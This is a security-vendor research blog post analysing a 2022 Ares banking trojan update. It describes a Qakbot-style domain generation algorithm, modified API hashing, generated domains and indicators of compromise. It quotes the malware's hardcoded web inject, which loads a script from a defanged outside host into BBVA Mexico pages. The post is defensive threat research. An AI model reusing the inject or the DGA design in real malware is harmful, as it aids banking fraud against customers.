Zscaler to Expand Zero Trust Exchange Platform's AI Cloud with Data Fabric Purpose-built for Security

Zscaler Blog

Get the latest Zscaler blog updates in your inbox

Subscribe
Security Research

The Ares Banking Trojan Learns Old Tricks: Adds the Defunct Qakbot DGA

image

Summary: ThreatLabz observed an update to the Ares banking trojan that introduces a domain generation algorithm (DGA), which mirrors the Qakbot DGA. Based on analyzing the malware code, there does not appear to be a direct link between these two malware families. The Ares DGA may be an effort for the threat actor to maximize the lifetime of an infection, which provides more opportunities for monetizing compromised systems through attacks such as wire fraud and ransomware.

 

Key Points

  • The Ares banking trojan received new updates in August 2022 including a domain generation algorithm (DGA) that is used as a fallback in the event the primary command-and-control (C2) communication channel is unreachable.
  • The domain generation algorithm implementation is virtually identical to the Qakbot banking trojan’s defunct DGA algorithm.
  • The DGA algorithm is based on a hardcoded seed and the current date. The algorithm generates 50 domains per interval (150 domains per month) and uses the daytime protocol to obtain the date.
  • Based on reverse engineering Ares, the DGA appears to be a reimplementation of Qakbot’s algorithm rather than sharing the same codebase.
  • The Ares banking trojan is currently being used to target financial institutions in Mexico.

Zscaler ThreatLabz has been tracking developments to the Ares banking trojan, which emerged in February 2021. Ares is based on the Osiris malware family, which in turn, was forked from the original Kronos banking trojan. Threat actors that utilize Ares had been inactive from approximately March 2022 to June 2022. However, there is a new version of Ares that was released in August 2022 that adds new features. These new Ares samples were compiled on August 15, 2022 and implement a domain generation algorithm. The introduction of a DGA is not by itself novel. However, the DGA algorithm is particularly interesting because it is nearly identical to the DGA that was implemented by the Qakbot banking trojan.

 

Technical Analysis

Ares samples contain one or more hardcoded URLs that are used as the primary C2 channel. In new versions of Ares, the malware will make up to 50 attempts to contact the primary C2 servers. If these C2 channels are unreachable, Ares will generate domains using a DGA. An example code comparison between the Ares DGA and Qakbot DGA is shown in Figure 1.

 

Image

Figure 1. Code comparison between the DGAs of Ares (left) and Qakbot (right)

 

The primary differences between the Ares DGA and the Qakbot DGA are the former generates 50 domains per interval while the old Qakbot algorithm generated 5,000 domains. In addition, Ares uses the daytime protocol via TCP port 13 to retrieve the current day from one of the following servers:

  • time-a.nist.gov
  • time-a-g.nist.gov
  • time.nist.gov

Ares will try each NIST daytime server up to three times. The response from the NIST server is similar to the following:

59820 22-08-29 23:18:13 50 0 0 593.0 UTC(NIST) * 

In contrast, the Qakbot DGA obtained the current date from public web servers including google.com, cnn.com, and microsoft.com. Similar to Qakbot, Ares converts the response from the daytime server to a string with the format Date: %a, %d %b %Y 00:00:00 GMT. An example string in this format is Date: Mon, 29 Aug 2022 00:00:00 GMT.

From this point forward, the algorithm is identical to Qakbot. The date string is converted to the format %u.%s.%s.%08x. The first parameter is an integer in the range between 0 and 2 (depending on the day of the month), followed by the abbreviated month converted to lowercase, followed by the year and a hardcoded constant. In the Ares samples analyzed by ThreatLabz, the magic constant was 0x9283920. Conversely, Qakbot typically hardcoded this magic value to 0 or 1. An example string in this format is 2.aug.2022.09283920. This string is then passed to a CRC32 hash function to produce an integer value that is used as a seed to a Mersenne Twister pseudo random number generator. The Mersenne Twister generates random integers that are used as an index to choose a sequence of lowercase alphabetic characters. The algorithm will produce a domain that is between 8 and 25 characters in length appended with a hardcoded top-level domain (TLD). The TLD is chosen by splitting the string com;net;org;info;biz;org (note the double use of the .org TLD) into an array and using the Mersenne Twister PRNG to choose an integer value as an index into the array. The algorithm splits the set of 50 domains into three time intervals. The first two intervals have a validity of 10 days, while the domains in the last interval are valid from 8 to 11 days depending on the number of days in the month. Therefore, Ares will generated 150 potential C2 domains per month. Example domains generated for August 29, 2022 by Ares are shown below in Table 1.
 

truktkqrhbqid.com

afthptslohtxez.info

sqahzasvxlfqfgmbhaprfa.org

ivdcsnrjyve.biz

ozwltevtjzxjt.biz

ysqoogvpyldzmpfrzcqy.biz

uippsfkjsfava.info

zzmlwansfyuccivdfscnhcsr.com

tswcpdxiaaz.com

llbkeikzi.com

axowplsnwlipfvxsafeeqnjk.org

bdwytmphgml.org

dkqnlmmqhd.org

dfzvvfzxxnzbuvjyapcvb.net

dqbcfturck.info

msirddguztwcbgaeyjo.com

wojwxbefozrxuaealwzv.org

klvfokpnhhrcffzku.net

lmdfbabllhzcfdomogl.org

uimlehvhuwtckjgpdgig.net

zkhedomcvpaiv.biz

yzuzswfkybcmllnel.net

kcmdsrapukosxvqnb.org

fdymwocojutqlc.org

vhfrymxypwcrxaioki.org

affptoavdvnmqyf.biz

sjnnzyad.net

zahdnhgplnetn.org

zkwdxdoycewkr.info

cbimmnjplweqg.biz

iztlcqlnlkjnepx.biz

qdavlycfepldabbu.info

sqbnndxmoc.net

wfnyzfwjlarffupafqh.org

umgkxgjjccmkftfuyydsdt.com

zayaugajoxoks.com

wpioqqyhdttoymcxkredun.org

hazovvbctmpkaigwzdbtpve.com

mndfoyaki.net

jsnrmrzwiulbmjpniafmbsheu.com

onfwmtjfntfzp.info

ptltetfmogk.org

ksnicjvlrhzotedcdn.net

lsuliwpuhovocjeyjxlggotft.info

jznilwezhqwdp.info

jgxcvpxxvfkxkgyyxwkiszo.biz

bytqndajubxkhqjy.org

wgxhfkmetcwnxaqnlhce.info

ugnnzgbirvceq.org

mxekahcaolryntmhrxpk.biz

 

 

Table 1. Ares DGA domains for August 29, 2022

At the time of publication, none of these domains currently resolve.

Analysis of the Ares code indicates that the algorithm was likely reimplemented rather than having access to the Qakbot DGA source code. In fact, there is an open source C implementation of the Qakbot algorithm that is likely the origin of the Ares implementation. In comparison, this open source implementation uses non-native Windows API functions for string operations (e.g., strcat, strlen, atoi, etc), which is identical to Ares. On the other hand, Qakbot uses Windows APIs including lstrcatA and lstrlenA.

ThreatLabz has modified a Python-based implementation of the Qakbot DGA authored by Johannes Bader to generate the Ares DGA domains. The Ares DGA tool is located in our GitHub repository here.

 

Web Inject Configuration

The Ares malware author appears to be testing web injects to insert HTML content and JavaScript into a targeted website. While the Ares C2 server is not currently serving a dynamic web inject configuration, recent samples contain the following hardcoded configuration targeting BBVA Mexico as shown below:

 

set_url http*bbva*.mx* GP
data_before
<body*>
data_end
data_inject
<div id="botid" style="display:none;">%BOTID%</div>
<script type="text/javascript" src="https://www.trendybaby.co[.]uk/assets/css/homeats.js"></script>
data_end

 

Dynamic API Hash Algorithm

The Ares malware author has altered the original Kronos source code to create new Windows API hash values for dynamically resolving NTDLL functions. The modification to the CRC64 algorithm is very slight, but sufficient to bypass static signatures that search for the previous Kronos hash values. In particular, the CRC64 polynomial (0xD800000000000000) was modified by setting the lower DWORD value from 0x00 to 0x10 as shown in Figure 2.

 

Image

Figure 2. Ares import hashing algorithm with a modification to the standard CRC64 polynomial

As an example, the standard CRC64 hash value for the string sprintf is 5FE79276722143D0, while in the latest Ares variant, the CRC64 hash value is DC1FC2878FEE79C0. Ares then utilizes the Kronos algorithm to map these values to alphanumeric characters. ThreatLabz has implemented a Python script (available in our GitHub repository) that can be used to generate these hash values. The full list of NTDLL API function names used by Ares and the corresponding hash values is located in the Appendix.

 

Conclusion

The developer of Ares continues to add new features to the malware to make it more resilient to detection and disruption. The implementation of Qakbot's DGA will allow a threat actor using Ares to easily deploy new C2 servers and regain control of infected systems if the primary servers are taken down. This is likely an indicator that further attacks are soon to follow.

 

 

Cloud Sandbox Detection

Zscaler cloud sandbox

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to the campaign at various levels with the following threat names:

Win32.Banker.Kronos

Win32.Banker.Kronos.LZ

 

Indicators of Compromise (IOC)

 

Indicator

Description

baae5bbaf2decf7af9b22c4d10f66c7c77c9ebc7b73476f7cbe449d2bba97ed9

Ares DGA variant SHA256

31ed2ee200da9a35ab3868b3d2977e6b18bc49772d39c27d57a53b49b6e6fa4a

Ares DGA variant SHA256

http://tomolina[.]top/panel/connect.php

Ares Hardcoded C2 URL

 

The domains generated by the Ares DGA for August 1, 2022 to December 31, 2022 are available here.

 

Ares Hash Values


 

API Function Name

Ares Hash Value

LdrGetProcedureAddress

Y3Y5E2P5S1S3D1U7

LdrLoadDll

F5R0Y0X7R5R3D8Y3

NtAllocateVirtualMemory

A6T2D7A2Q2R5B6T6

NtClose

F0D3C0A7F5T6P3A2

NtCreateFile

T1D7X7R5D7U6C6Q7

NtCreateKey

Q3C6Y3P7U6C6P2A3

NtCreateSection

P4H8Y3Q3B2Q0S7B7

NtDebugActiveProcess

Q3A7Q6R3H0G0B6B7

NtDelayExecution

D8B3B3T8A4F6P3T5

NtDeleteFile

S3Y3U5G1X0E2T3P7

NtDeleteValueKey

Y3G2G7G3B3D2P7F6

NtDuplicateObject

U6D1G5D8G1E3R6H4

NtEnumerateValueKey

Q6T4F5Q0F1S2G1Y5

NtFreeVirtualMemory

X3A2D5D5B4S7F3C4

NtGetContextThread

E3Y5Q4R2G7R4U3S5

NtMapViewOfSection

B4S3E6S5C6G5Y6Y6

NtOpenEvent

G2D4H0P5F5Q7Q0C0

NtOpenFile

T4X3U6U8E7Q0D3C7

NtOpenProcess

C0P7A7F2E0S3T7R2

NtProtectVirtualMemory

B4Y5P8D6B6H5X6Y3

NtQueryDirectoryFile

T5S2Y5T4C4F7U7H0

NtQueryInformationFile

B5A5U0Q7Y2Y3Q1E3

NtQueryInformationProcess

C4P7T3B7C7S4P6Q0

NtQueryInformationThread

C3Q6D4C4F6H3F2Y0

NtQueryKey

T5S7B2T7H1A2P4R5

NtQueryObject

X6U2A2E3Q3U0A7H1

NtQuerySystemInformationEx

U0Y1S6E3F0U7C3R8

NtQueryValueKey

E5H8F2Y6S2A6R1Y7

NtQueryVirtualMemory

U6G3B5G1F1T7S3E5

NtReadVirtualMemory

E7G2G4S8Y3Y4X3X3

NtResumeThread

P3U8P1B3P6E8D1U4

NtSetContextThread

Q2U4U2S2C3F3S8G1

NtSetInformationFile

P4Y2Q6Q1E6P5R6A3

NtSetValueKey

U5P3A7T2Q5P5S0F3

NtSuspendThread

G3R4B6T2T5A6Y8P7

NtTerminateThread

S4Q5T3G3R4F7Q6G4

NtUnmapViewOfSection

G4C3G4F6X7Y3D7H7

NtWriteFile

C8A3E5D4U3E2T3T5

NtWriteVirtualMemory

F0X2G2Q5B5Q6G3U6

RtlAnsiStringToUnicodeString

Y3S6P7G1H7H0C8G4

RtlCompareUnicodeString

U2H5G7F7B6A5P2F4

RtlCreateUserThread

F3A6S6D2B8B3X2C7

RtlDeregisterWaitEx

S7U1S0U0H7G2Q7E3

RtlDosPathNameToNtPathName_U

G3B2Q3G0B6A7D0P5

RtlFreeAnsiString

X2X7C3S2R2B4S0X4

RtlFreeUnicodeString

T1H6C8A2R2C3T7S8

RtlInitAnsiString

D1X1G3A7Q6T0U3U1

RtlInitUnicodeString

D6G5P3A8R3G3Y4Q1

RtlRandomEx

R7T6F8E2G2B8B2Y4

RtlRegisterWait

R4C0F3R3P8Y1X6Y2

RtlUnicodeStringToAnsiString

B0U7C3F3D3B4X5T5

_vsnprintf

Y2X6H4E2U7B3G6T0

_vsnwprintf

T5C2D5Q2F2D6H0G3

_wcsicmp

E3C2R6D6R8Q4R2U7

_wcsnicmp

U3S3Y5P3F2S8Q4S5

sprintf

S4Y7R5G1G7T6F3R3

 

form submtited
Thank you for reading

Was this post useful?

dots pattern

Get the latest Zscaler blog updates in your inbox

By submitting the form, you are agreeing to our privacy policy.